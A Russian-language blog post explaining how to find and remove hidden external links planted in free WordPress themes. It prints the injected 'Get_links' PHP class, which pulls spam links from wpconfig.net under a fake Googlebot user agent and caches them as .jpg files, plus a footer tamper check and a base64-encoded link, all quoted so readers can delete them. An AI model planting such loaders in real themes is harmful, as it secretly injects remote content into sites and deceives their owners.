Берём бесплатный шаблон Вордпресс

ssylka
Используя бесплатные шаблоны нужно иметь ввиду, что на них могут оказаться внешние ссылки (т.е. ссылки ведущие в интернет на другой ресурс).




Первое. С официального сайта Вордпресс пишут — «Если вы хотите чтобы на вашем сайте не выводились партнерские ссылки, вам нужно отредактировать файл шаблона “comments.php”(иногда код находится в “footer.php”), удалив код: 

require_once(‘functions.php’);
$links = new Get_links();
$links = $links->return_links($lib_path);
echo $links; ?> 


Второе на что стоит обратить внимание это на function.php.

В нем есть специальный скрипт, который через определенное время начинает подгружать внешние ссылки на сайт. Нужно также отредактировать файл functions.php. В нем нужно отыскать код:

class Get_links { var $host = 'wpconfig.net'; var $path = '/system.php'; var $_cache_lifetime    = 21600; 
 var $_socket_timeout    = 5; 
 function get_remote() { 
 $req_url = 'http://'.$_SERVER['HTTP_HOST'].urldecode($_SERVER['REQUEST_URI']); 
 $_user_agent = "Mozilla/5.0 (compatible; Googlebot/2.1; ".$req_url.")"; 
 $links_class = new Get_links(); 
 $host = $links_class->host; 
 $path = $links_class->path; 
 $_socket_timeout = $links_class->_socket_timeout;
 $_user_agent = $links_class->_user_agent; 
 @ini_set(‘allow_url_fopen',          1); 
 @ini_set(‘default_socket_timeout',   $_socket_timeout); 
 @ini_set(‘user_agent', $_user_agent); 

 if (function_exists(‘file_get_contents')) { 
 $opts = array( ‘http'=>array( ‘method'=>"GET", ‘header'=>"Referer: {$req_url}\r\n". "User-Agent: {
 $_user_agent}\r\n" ) ); 
 $context = stream_context_create($opts); 
 $data = @file_get_contents(‘http://' . $host . $path, false, $context); 
 preg_match(‘/(\<\!—link—\>)(.*?)(\<\!—link—\>)/', $data, $data); 
 $data = @$data[2]; return $data;
 } 
 return '<!—link error—>'; 
 }

function return_links($lib_path) { 
 $links_class = new Get_links(); 
 $file = ABSPATH.'wp-content/uploads/2011/'.md5($_SERVER['REQUEST_URI']).'.jpg'; $_cache_lifetime = $links_class->_cache_lifetime; 
 if (!file_exists($file)) { @touch($file, time()); 
 $data = $links_class->get_remote(); 
 file_put_contents($file, $data); return $data;
 } 
 elseif ( time()-filemtime($file) > $_cache_lifetime || filesize($file) == 0) {
 @touch($file, time()); 
 $data = $links_class->get_remote();
 file_put_contents($file, $data); 
 return $data;
 }
  else { 
 $data = file_get_contents($file); return $data; 
 } } } 

И также его удалить!

В различных шаблонах он может выглядеть по-разному, однако его легко отыскать, вбив в строку поиска "class Get_links".  

Поехали дальше.
Также имеются еще скрытые ссылки в футере.
Имеется запись типа:
<?php __wordpress_pf(); ?>
Если ее удалить, то сайт перестает функционировать, так что перед её удалением сначала нужно поправить код  в function.php:
function __wordpress_headers() { 
$lua = '&amp;lt;?php __wordpress_pf(); ?&amp;gt;'; 
$fox = dirname(__FILE__) . '/footer.php'; 
$fd = fopen($fox,'r'); 
$caf = fread($fd,filesize($fox)); 
fclose($fd); 
if (strpos($caf,$lua)==0) { echo ""; die; } } 

Нужно в этом коде ‘0’ поменять на ‘1’ и после этого можно уже удалять из футера этот код.  

Ну и посмотрим ещё на один вид ссылок.
Это закодированные алгоритмом MIME base64.
В файлах шаблона код данных ссылок выглядит примерно следующим образом:
<?php $str = 'PGEgaHJlZj0iaHR0cDovL2V4cHJvbXRvbS5ydS8iPjwvYT4=';
echo base64_decode($str);
?>
Обратим внимание на строку 2, в которой в одиночных кавычках находится непонятный набор символов. Это и есть ссылка, закодированная с помощью алгоритма MIME base64.
Раскодировать данный набор символов можно с помощью бесплатного онлайн декодера…  
В общем удаляем ее и смотрим результат. )


Оставить комментарий